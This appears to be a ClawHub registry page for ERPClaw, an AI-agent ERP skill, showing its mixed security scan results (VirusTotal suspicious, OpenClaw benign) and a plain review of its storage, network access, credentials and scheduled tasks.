ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

ERPClaw

v3.4.3

AI-native ERP system. Full accounting, invoicing, inventory, purchasing, tax, billing, HR, payroll, advanced accounting (ASC 606/842, intercompany, consolida...

0· 1.2k·7 current·8 all-time
byNikhil Jathar@mailnike
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotalVirusTotal
Suspicious
View report →
OpenClawOpenClaw
Benign
high confidence
Purpose & Capability
Name/description (full ERP stack) matches the included files and actions (accounting, payroll, revenue, leases, intercompany, consolidation, HR, etc.). Declared required binaries (python3, git) are appropriate for the Python-based implementation. No unrelated credentials, exotic binaries, or config paths are requested.
Instruction Scope
Runtime instructions and SKILL.md direct the agent to initialize and operate a local SQLite DB (~/.openclaw/erpclaw/data.sqlite) and to run packaged Python scripts. The codebase reads/writes only its local DB, imports libraries from ~/.openclaw/erpclaw/lib, and documents two types of network activity: fetching exchange rates (public API) and user-approved GitHub module installs. This scope is appropriate for an ERP but you should note it will read/write data under your home directory and persist integration API keys in the local DB (per the docs).
Install Mechanism
There is no external downloader in the registry install spec; SKILL.md includes a post-install/init step that runs a local Python script to initialize the DB. Module installs from GitHub are described but require explicit user approval. No remote archives, URL-shortened downloads, or opaque extract steps are used by default.
Credentials
The skill declares no required environment variables (only an optional ERPCLAW_DB_PATH). It does not ask for unrelated secrets. Integration API keys are expected to be provided as flags and stored locally in the DB (documented), which is proportionate but means those keys live on-disk in the app DB.
Persistence & Privilege
always:false and normal autonomous invocation are used (platform default). The skill will create and persist a local SQLite DB and supporting files under ~/.openclaw/erpclaw and defines cron triggers for routine ERP tasks. This persistence is expected for an ERP but you should confirm you are comfortable with on-disk storage and scheduled actions.
Assessment
This skill appears consistent with its stated purpose, but before installing: (1) review and back up any existing ~/.openclaw data because the skill initializes and writes a local SQLite DB there; (2) confirm you are okay storing integration API keys in that local DB and protect the file (filesystem permissions, backups, encryption if needed); (3) note the skill may contact public exchange-rate APIs and will allow user-approved GitHub module installs—do not approve module installs you don't trust; (4) inspect/run the code in a safe environment (sandbox or test account) if you want to audit behavior (there are many files and some truncated code had minor bugs, not evidence of malice); (5) review scheduled cron triggers and adjust or disable them if you prefer manual control.

Like a lobster shell, security has layers — review code before you run it.

latestvk97cxmhqbsmt5wdqqks25jsek9843h2v

License

MIT-0
Free to use, modify, and redistribute. No attribution required.
Termshttps://spdx.org/licenses/MIT-0.html

Runtime requirements

OSmacOS · Linux
Binspython3, git

Comments